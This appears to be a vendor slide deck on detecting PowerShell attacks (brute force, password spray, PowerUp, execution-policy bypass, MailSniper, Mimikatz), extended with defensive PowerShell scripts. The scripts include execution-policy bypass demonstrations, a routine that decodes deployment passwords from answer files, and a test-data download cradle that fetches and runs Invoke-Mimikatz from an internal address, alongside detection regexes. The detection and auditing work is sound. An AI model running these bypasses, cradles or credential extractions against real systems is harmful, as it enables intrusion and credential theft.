2. Major issues with native PowerShell (PS) auditing
• Large volume of logs: confirming a single brute-force attempt can mean reading through well over 100 individual failed-logon events
• Legitimate use: administrators and scheduled tasks run PowerShell every day, so the few malicious scripts are buried among many legitimate ones
• Limited search capabilities: there is no filtered search across the logs (e.g. tracking a malicious script by its code or by the commands it invoked)
• No instant alert when a malicious command or script is executed
• No way to apply remedial measures when malicious scripts or cmdlets are detected
3. The ADAudit Plus approach to detecting PowerShell attacks
• An attacker gains access, or an insider goes rogue
• A malicious script is run using PowerShell
• ADAudit Plus performs filtered searches for malicious PS commands/scripts
• It alerts the admin via SMS/email
• It takes corrective action
5. Get a bird's-eye view of all PowerShell scripts
• Bird's-eye view of the scripts and commands executed by users
• Granular search based on users, commands invoked, and more
6. A classic brute-force attack on the administrator account
• A brute-force attack is simple: the attacker tries a large number of predictable or commonly used passwords against one account until one of them works
• Keyed in manually at a native logon prompt, such attempts are slow and conspicuous, because the number of failed logons for the account climbs quickly
• Scripted with PowerShell, the same attack can test millions of passwords unattended:
– The built-in Administrator account (RID 500) is the likely target, because it can never be deleted from Active Directory and, by default, is not locked out by the account lockout policy the way ordinary accounts are, so the guessing can continue indefinitely
7. Detecting PowerShell-based brute-force attacks with ADAudit Plus
• Perform granular searches for the users who executed PS scripts, and get the script path
• Find the exact script code
• Search based on the commands invoked
8. A domain password spray attack using PowerShell
• A domain password spray is a slightly more advanced variant of the typical brute-force attack: the same idea turned sideways
• Instead of many passwords against one account, the attacker takes a single password (or a short password list) and tries it against every account in the domain
• The spray is paced deliberately so that no account is locked out: each account receives fewer attempts than the lockout threshold, and the script waits out the lockout observation window (typically 30 minutes, which it reads from the domain policy and adjusts to) before the next pass with the next password
9. Detecting password spray attacks with ADAudit Plus
• A code block in the script that reads the lockout counter reset time
• Details such as the name and SID of the account that ran the script, and more
• Complete script details
10. Specific script functions (such as reading the lockout observation window) can be detected with ADAudit Plus, and corrective actions (such as changing the lockout observation time) can be performed immediately to counter the attack attempt
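The two patterns from slides 6 and 8 can be told apart in the failed-logon data itself, because the spray deliberately stays under the lockout threshold while the brute force blows through it. The following is an added example, not code from the deck or from ADAudit Plus: it groups failures by source address and uses the domain lockout policy as the analysis window. The $sample records are constructed test data shaped like the TargetUserName/IpAddress/TimeCreated fields of Security events 4625 and 4771; the commented lines at the end show how to feed real events from a domain controller.

```powershell
# Added example, not from the deck: separate brute force (one account, many
# attempts) from password spray (many accounts, few attempts each) in failed
# logon data, using the domain lockout policy as the analysis window.
# $sample is constructed test data shaped like the TargetUserName/IpAddress/
# TimeCreated fields of Security events 4625 and 4771.

function Get-LogonAttackCandidates {
    param(
        [Parameter(Mandatory)] [object[]] $FailedLogons,
        # Defaults mirror a common domain policy: 5 bad attempts in 30 minutes locks.
        [int] $LockoutThreshold = 5,
        [int] $ObservationWindowMinutes = 30,
        # A spray is reported once one source has touched this many distinct accounts.
        [int] $SprayAccountThreshold = 10
    )
    $window = [TimeSpan]::FromMinutes($ObservationWindowMinutes)

    foreach ($bySource in ($FailedLogons | Group-Object IpAddress)) {
        $events  = @($bySource.Group | Sort-Object TimeCreated)
        $elapsed = $events[-1].TimeCreated - $events[0].TimeCreated
        # @() keeps this an array even when only one account was targeted;
        # otherwise .Count would return that single group's event count.
        $perAccount = @($events | Group-Object TargetUserName)

        # Brute force: one account pushed to the lockout threshold inside a window.
        # The built-in Administrator (RID 500) produces no 4740 lockout event, so
        # for that account this count is the only signal available.
        foreach ($acct in $perAccount) {
            $times = @($acct.Group | Sort-Object TimeCreated | ForEach-Object TimeCreated)
            $span  = $times[-1] - $times[0]
            if ($acct.Count -ge $LockoutThreshold -and $span -le $window) {
                [pscustomobject]@{
                    Type   = 'BruteForce'
                    Source = $bySource.Name
                    Target = $acct.Name
                    Events = $acct.Count
                    Detail = "$($acct.Count) failures in $([int]$span.TotalMinutes) min"
                }
            }
        }

        # Spray: the per-account count is kept under the threshold by design, so it
        # is not the signal; the number of distinct accounts hit from one source is.
        $maxPerAccount = ($perAccount | Measure-Object -Property Count -Maximum).Maximum
        if ($perAccount.Count -ge $SprayAccountThreshold -and $maxPerAccount -lt $LockoutThreshold) {
            [pscustomobject]@{
                Type   = 'PasswordSpray'
                Source = $bySource.Name
                Target = "$($perAccount.Count) accounts"
                Events = $events.Count
                Detail = "max $maxPerAccount attempt(s) per account, $([int]$elapsed.TotalMinutes) min first to last"
            }
        }
    }
}

# Constructed sample: a brute force against Administrator, a two-pass spray
# paced 31 minutes apart (just outside a 30-minute observation window), and noise.
$t0 = Get-Date '2024-01-15T09:00:00'
$sample = @(
    foreach ($i in 1..12) { [pscustomobject]@{ TargetUserName = 'Administrator'; IpAddress = '10.0.0.5'; TimeCreated = $t0.AddSeconds(30 * $i) } }
    foreach ($i in 1..15) { [pscustomobject]@{ TargetUserName = "user$i"; IpAddress = '10.0.0.9'; TimeCreated = $t0.AddSeconds($i) } }
    foreach ($i in 1..15) { [pscustomobject]@{ TargetUserName = "user$i"; IpAddress = '10.0.0.9'; TimeCreated = $t0.AddMinutes(31).AddSeconds($i) } }
    [pscustomobject]@{ TargetUserName = 'jdoe'; IpAddress = '10.0.0.20'; TimeCreated = $t0.AddMinutes(5) }
    [pscustomobject]@{ TargetUserName = 'jdoe'; IpAddress = '10.0.0.20'; TimeCreated = $t0.AddMinutes(6) }
)
Get-LogonAttackCandidates -FailedLogons $sample | Format-Table -AutoSize

# On a domain controller, feed real Kerberos pre-authentication failures instead
# (event 4771; its IpAddress field arrives as ::ffff:10.0.0.5):
# $real = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4771; StartTime = (Get-Date).AddHours(-1) } | ForEach-Object {
#     $d = @{}; ([xml]$_.ToXml()).Event.EventData.Data | ForEach-Object { $d[$_.Name] = $_.'#text' }
#     [pscustomobject]@{ TargetUserName = $d.TargetUserName; IpAddress = $d.IpAddress; TimeCreated = $_.TimeCreated } }
# Get-LogonAttackCandidates -FailedLogons $real
```

Set $LockoutThreshold and $ObservationWindowMinutes from the real domain policy (Get-ADDefaultDomainPasswordPolicy), since a spray tuned to that policy will sit just below exactly those numbers; the spray rule fires on distinct accounts per source, which is the quantity a policy-aware attacker cannot keep small.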
11. Privilege escalation attacks using PowerShell
• PowerShell is used not only for password-based attacks but for post-exploitation activity, privilege escalation included
• PowerUp (part of the PowerSploit toolkit) audits a compromised host for common local privilege-escalation misconfigurations: leftover unattended-install answer files that may hold deployment credentials, services a low-privileged user can modify, and the AlwaysInstallElevated setting, which makes msiexec run any Windows Installer (MSI) package as SYSTEM
• Its Write-UserAddMSI function drops a pre-compiled MSI that, when run, shows a small dialog and quietly adds the user and group entered into it, typically a new local administrator account that serves as a backdoor
12. Detecting privilege escalation attacks with ADAudit Plus
• A function that lists unattended-install files (which may hold deployment credentials) usable for privilege escalation (PowerUp's Get-UnattendedInstallFile)
• A function that writes out a pre-compiled MSI installer prompting for a user/group to add (Write-UserAddMSI)
• A function that lists exploitable services (Get-ModifiableService and the related service checks)
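Detecting the PowerUp functions in the logs is one half; the other is checking whether the misconfigurations they look for exist on your hosts, since the MSI trick on slide 11 only escalates when AlwaysInstallElevated is set in both hives. The following is an added example, not code from the deck, from ADAudit Plus or from PowerUp itself: a read-only audit of the AlwaysInstallElevated policy, the standard answer-file locations (with decoding of the base64 password form unattend.xml uses when PlainText is false), and unquoted service paths. The registry keys and file paths are the documented Windows locations; the demo at the end parses a constructed unattend.xml written to TEMP, so it runs on a healthy host.

```powershell
# Added example, not from the deck or from PowerUp: a read-only audit of the
# misconfigurations behind the MSI backdoor. AlwaysInstallElevated (1 in BOTH
# HKLM and HKCU) makes msiexec run any .msi as SYSTEM for any user, and leftover
# Windows Setup answer files can hold deployment passwords. Registry and file
# locations are the documented Windows ones; the demo uses a constructed file.

function Test-AlwaysInstallElevated {
    $hives = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
             'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    $values = foreach ($h in $hives) {
        $val = $null
        $v = Get-ItemProperty -Path $h -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        if ($v) { $val = $v.AlwaysInstallElevated }
        [pscustomobject]@{ Key = $h; AlwaysInstallElevated = $val }
    }
    # msiexec only elevates when the policy is set in both hives.
    [pscustomobject]@{
        Vulnerable = (@($values | Where-Object AlwaysInstallElevated -eq 1).Count -eq 2)
        Keys       = $values
    }
}

function Get-UnattendCredential {
    # Answer-file locations Windows Setup and Sysprep are known to leave behind.
    param([string[]] $Path = @(
        "$env:SystemDrive\sysprep.inf", "$env:SystemDrive\sysprep\sysprep.xml",
        "$env:windir\Panther\Unattend.xml", "$env:windir\Panther\Unattended.xml",
        "$env:windir\Panther\Unattend\Unattend.xml", "$env:windir\Panther\Unattend\Unattended.xml",
        "$env:windir\System32\Sysprep\unattend.xml", "$env:windir\System32\Sysprep\Panther\unattend.xml"))

    foreach ($file in $Path) {
        if (-not (Test-Path -LiteralPath $file)) { continue }
        $text = Get-Content -LiteralPath $file -Raw
        # unattend.xml: <Password>/<AdministratorPassword> with <Value> and optional
        # <PlainText>false</PlainText>; when false, Value is base64 of UTF-16LE(password + "Password").
        foreach ($m in [regex]::Matches($text, '(?is)<(?:Administrator)?Password>\s*<Value>(.*?)</Value>\s*(?:<PlainText>(true|false)</PlainText>)?')) {
            $value = $m.Groups[1].Value.Trim()
            if ($m.Groups[2].Value -eq 'false') {
                try { $value = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($value)) -replace 'Password$', '' } catch {}
            }
            [pscustomobject]@{ File = $file; Source = 'unattend.xml'; Password = $value }
        }
        # sysprep.inf: AdminPassword=... under [GuiUnattended]
        foreach ($m in [regex]::Matches($text, '(?im)^\s*AdminPassword\s*=\s*(.+?)\s*$')) {
            [pscustomobject]@{ File = $file; Source = 'sysprep.inf'; Password = $m.Groups[1].Value }
        }
    }
}

function Get-UnquotedServicePath {
    # The classic "exploitable service": an unquoted binary path containing a space.
    Get-CimInstance Win32_Service | Where-Object {
        $_.PathName -and $_.PathName -notmatch '^"' -and (($_.PathName -split '\.exe')[0] -match '\s')
    } | Select-Object Name, PathName, StartName
}

# Constructed demo: a minimal unattend.xml carrying a base64 ("PlainText false")
# local Administrator password, written to TEMP and audited like a real one.
$demo    = Join-Path $env:TEMP 'unattend-demo.xml'
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('S3cretDeploy!Password'))
$xml = @"
<unattend><settings pass="oobeSystem"><UserAccounts><AdministratorPassword>
<Value>$encoded</Value><PlainText>false</PlainText>
</AdministratorPassword></UserAccounts></settings></unattend>
"@
Set-Content -LiteralPath $demo -Value $xml
Get-UnattendCredential -Path $demo | Format-Table -AutoSize
Remove-Item -LiteralPath $demo

Test-AlwaysInstallElevated
Get-UnquotedServicePath | Format-Table -AutoSize
```

Run without parameters, Get-UnattendCredential walks the standard locations; a non-empty result or a Vulnerable = True from Test-AlwaysInstallElevated is exactly the condition under which the Write-UserAddMSI package on slide 12 would hand the attacker an administrator account.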
13. Bypassing execution policies with PowerShell
• The starting point before running any malicious PowerShell script file is getting past the execution policy, which on client Windows defaults to Restricted
• The execution policy is a safety rail, not a security boundary: Restricted refuses to run any script file at all, and AllSigned/RemoteSigned require a trusted signature on every script, or on scripts downloaded from the internet, respectively. It never looks at commands typed or piped into the interpreter
• It is also extremely easy to bypass: Set-ExecutionPolicy Unrestricted (or -Scope Process Bypass, which needs no admin rights), powershell.exe -ExecutionPolicy Bypass, or simply piping a script's text into Invoke-Expression. After that, any malicious code runs without hindrance
14. Detecting execution policy bypass attempts with ADAudit Plus
• Search for bypass commands and the user who invoked them
• Find the exact commands run, values changed, etc.
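Slide 13's claim is easy to verify on any workstation. The following is an added example, not code from the deck or from ADAudit Plus: with the policy locked to Restricted in the current session it runs the same harmless script file four ways, and shows which ones the policy actually stops. It runs as an ordinary, non-admin user in Windows PowerShell; the scratch file name under TEMP is the only assumption.

```powershell
# Added example, not from the deck: why the execution policy is a user safety
# rail rather than a security boundary. Run as an ordinary (non-admin) user in
# Windows PowerShell; no step here needs elevation, which is the point.

function Test-ExecutionPolicyBypass {
    $ErrorActionPreference = 'Stop'
    $script = Join-Path $env:TEMP 'ep-demo.ps1'
    Set-Content -Path $script -Value '"script file executed as $env:USERNAME"'
    $r = [ordered]@{}

    # Process scope needs no admin rights either, so lock this session down first.
    Set-ExecutionPolicy -Scope Process -ExecutionPolicy Restricted -Force
    $r['EffectivePolicy'] = (Get-ExecutionPolicy).ToString()

    # Restricted does block the script *file*...
    try   { $r['DirectRun'] = & $script }
    catch { $r['DirectRun'] = 'BLOCKED: ' + $_.Exception.GetType().Name }

    # ...but the policy never looks at text handed to the interpreter, so the same
    # bytes piped into Invoke-Expression run. This is what most "bypasses" are.
    $r['ViaInvokeExpression'] = Get-Content -Path $script -Raw | Invoke-Expression

    # A child process can simply be told to ignore the policy (this is what shows
    # up in 4688 process-creation logs as "-ExecutionPolicy Bypass").
    $r['ViaChildBypass'] = & powershell.exe -NoProfile -ExecutionPolicy Bypass -File $script

    # Or the payload travels base64 (UTF-16LE) encoded; without script block
    # logging, the command line shows only the blob.
    $blob = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes((Get-Content -Path $script -Raw)))
    $r['ViaEncodedCommand'] = & powershell.exe -NoProfile -EncodedCommand $blob

    Remove-Item -Path $script -Force
    [pscustomobject]$r
}

Test-ExecutionPolicyBypass | Format-List

# The scopes Set-ExecutionPolicy cannot override are MachinePolicy and UserPolicy,
# which come from Group Policy; with one of those set, the "Set-ExecutionPolicy
# Unrestricted" from the slide fails with an error instead of taking effect.
Get-ExecutionPolicy -List
```

Only DirectRun is blocked; the other three entries carry the script's output. The practical consequences: enforce the policy through Group Policy (MachinePolicy) so the Set-ExecutionPolicy call itself fails and is logged, and hunt the real bypasses (-ExecutionPolicy Bypass, -EncodedCommand, Invoke-Expression over file or download contents) in process-creation and script block logs rather than relying on the policy.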
15. Attacking Exchange Servers with PowerShell
• PowerShell can be used to attack not only Active Directory but hybrid environments too, in this case Exchange or Office 365
• MailSniper is a free PowerShell toolkit for attacking Exchange/OWA: it can harvest the internal domain name and valid usernames by observing response timing, and it can run a password spray against every account that has a mailbox on the Exchange Server
• Once one mailbox is compromised, the credentials are used to perform a global mail search across the organization and write the matching messages out to a CSV file, which frequently contains sensitive data such as logon credentials
16. Discovering Exchange/Office 365 attacks with ADAudit Plus
• A Get-Credential call, which opens a dialog box asking for account credentials
• An Invoke-WebRequest connecting to an Exchange Server
• An Invoke-GlobalMailSearch attempt to read mail passing within the organization
17. Get-Credential: a legitimate cmdlet that opens the standard Windows credential dialog. Run from an already-compromised session, it hands the attacker a convincing prompt; an unsuspecting user who sees it will type in the requested details under the impression that it is a legitimate request. Nothing in the dialog distinguishes it from the real thing, so the call itself is what to search for
18. There is more than one way to leverage PowerShell for attacks
19. Detecting remote PowerShell attempts, version downgrades, and third-party attack toolkit use with ADAudit Plus
20.
• An attempt to create a PS remote session (New-PSSession/Enter-PSSession) to execute commands on another host
• Often the first step in a PS remoting attack: enabling remoting (Enable-PSRemoting) on the target
• A PowerShell version downgrade (powershell.exe -Version 2) to run an earlier engine that lacks script block logging and the other security features of later versions
• Invoking a third-party tool (Mimikatz, via Invoke-Mimikatz) for post-exploitation credential theft
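The filtered searches on slides 14, 16 and 20 all work from the same source: the script text that PowerShell records when script block logging is enabled, plus the engine-start event that betrays a downgrade (the 2.0 engine writes no script block events at all, so the only trace is its EngineVersion in event 400). The following is an added example, not code from the deck or from ADAudit Plus: a small rule table run over event records, covering the bypass, downgrade, remoting, Get-Credential, Mimikatz, MailSniper and PowerUp indicators from the slides. The $sample records are constructed test data; the commented lines at the end pull the real events.

```powershell
# Added example, not from the deck: a pattern-driven hunt over PowerShell script
# block logs (Microsoft-Windows-PowerShell/Operational event 4104, ScriptBlockText)
# and the engine-start event (Windows PowerShell log, event 400, whose message
# carries EngineVersion=). $sample is constructed test data.

$SuspiciousPatterns = @(
    @{ Rule = 'ExecutionPolicyBypass'; Regex = 'Set-ExecutionPolicy\s+(?:-ExecutionPolicy\s+)?(Unrestricted|Bypass)|-(ExecutionPolicy|ep|ex)\s+Bypass' }
    @{ Rule = 'EncodedCommand';        Regex = '-(EncodedCommand|enc|ec|e)\s+[A-Za-z0-9+/=]{40,}' }
    @{ Rule = 'EngineDowngrade';       Regex = 'powershell(\.exe)?\s[^\n]*-v(ersion)?\s+2\b|EngineVersion=2\.0' }
    @{ Rule = 'RemotingEnabled';       Regex = 'Enable-PSRemoting' }
    @{ Rule = 'RemoteSession';         Regex = 'New-PSSession|Enter-PSSession|Invoke-Command\s[^\n]*-ComputerName' }
    @{ Rule = 'CredentialPrompt';      Regex = 'Get-Credential' }
    @{ Rule = 'Mimikatz';              Regex = 'Invoke-Mimikatz|sekurlsa::|lsadump::' }
    @{ Rule = 'MailSniper';            Regex = 'Invoke-(GlobalMailSearch|SelfSearch|PasswordSprayOWA|DomainHarvestOWA|UsernameHarvestOWA)' }
    @{ Rule = 'PowerUp';               Regex = 'Invoke-AllChecks|Write-UserAddMSI|Get-UnattendedInstallFile|Get-ModifiableService' }
    @{ Rule = 'DownloadCradle';        Regex = '(Invoke-WebRequest|\biwr\b|Net\.WebClient|DownloadString)[^\n]{0,200}(Invoke-Expression|\biex\b)|(Invoke-Expression|\biex\b)[^\n]{0,50}(DownloadString|Invoke-WebRequest)' }
)

function Find-SuspiciousPowerShell {
    param([Parameter(Mandatory)] [object[]] $Events)
    foreach ($e in $Events) {
        # Collapse multi-line script blocks so the patterns can span line breaks.
        $oneLine = ($e.Text -replace '\s+', ' ').Trim()
        foreach ($p in $SuspiciousPatterns) {
            if ($oneLine -match $p.Regex) {          # -match is case-insensitive by default
                [pscustomobject]@{
                    Time    = $e.TimeCreated
                    User    = $e.User
                    Host    = $e.Computer
                    EventId = $e.Id
                    Rule    = $p.Rule
                    Snippet = $oneLine.Substring(0, [Math]::Min(70, $oneLine.Length))
                }
            }
        }
    }
}

# Constructed sample: one benign script among the attack chain from the slides.
$t0 = Get-Date '2024-01-15T10:00:00'
$sample = @(
    [pscustomobject]@{ TimeCreated = $t0;               User = 'CORP\jdoe';  Computer = 'WS01'; Id = 4104; Text = 'Get-ChildItem C:\Reports | Export-Csv report.csv' }
    [pscustomobject]@{ TimeCreated = $t0.AddMinutes(1); User = 'CORP\jdoe';  Computer = 'WS01'; Id = 4104; Text = 'Set-ExecutionPolicy Unrestricted -Force' }
    [pscustomobject]@{ TimeCreated = $t0.AddMinutes(2); User = 'CORP\jdoe';  Computer = 'WS01'; Id = 400;  Text = 'Engine state is changed from None to Available. Details: HostName=ConsoleHost EngineVersion=2.0 RunspaceId=...' }
    [pscustomobject]@{ TimeCreated = $t0.AddMinutes(3); User = 'CORP\jdoe';  Computer = 'WS01'; Id = 4104; Text = 'IEX (New-Object Net.WebClient).DownloadString("http://10.0.0.99/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command "sekurlsa::logonpasswords"' }
    [pscustomobject]@{ TimeCreated = $t0.AddMinutes(4); User = 'CORP\jdoe';  Computer = 'WS01'; Id = 4104; Text = '$c = Get-Credential; Invoke-GlobalMailSearch -ImpersonationAccount jdoe -ExchHostname mail.corp.local -OutputCsv mail.csv' }
    [pscustomobject]@{ TimeCreated = $t0.AddMinutes(5); User = 'CORP\admin'; Computer = 'DC01'; Id = 4104; Text = 'Enable-PSRemoting -Force; New-PSSession -ComputerName FS01' }
)
Find-SuspiciousPowerShell -Events $sample | Sort-Object Time | Format-Table -AutoSize

# Real data. Script block logging must be on first:
#   HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging, EnableScriptBlockLogging = 1
# $real = @(
#   Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } |
#     ForEach-Object { [pscustomobject]@{ TimeCreated = $_.TimeCreated; User = $_.UserId; Computer = $_.MachineName; Id = $_.Id; Text = $_.Properties[2].Value } }
#   Get-WinEvent -FilterHashtable @{ LogName = 'Windows PowerShell'; Id = 400 } |
#     ForEach-Object { [pscustomobject]@{ TimeCreated = $_.TimeCreated; User = $_.UserId; Computer = $_.MachineName; Id = $_.Id; Text = $_.Message } }
# )
# Find-SuspiciousPowerShell -Events $real | Group-Object User | Sort-Object Count -Descending
```

Every record except the first one trips at least one rule, and the Mimikatz line trips two (DownloadCradle and Mimikatz). The Group-Object User at the end is the "bird's-eye view" from slide 5 in its simplest form: one row per user with the number of suspicious blocks they produced.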
22. Instant PowerShell-based alerts
• Set threshold-based alerts
• Filter alerts granularly on various parameters
• Instantly notify the admin, or take corrective action
23. PowerShell-based attacks are on the rise. It is crucial to have a bird's-eye view of all PowerShell-based activity and a strong 24x7 defense mechanism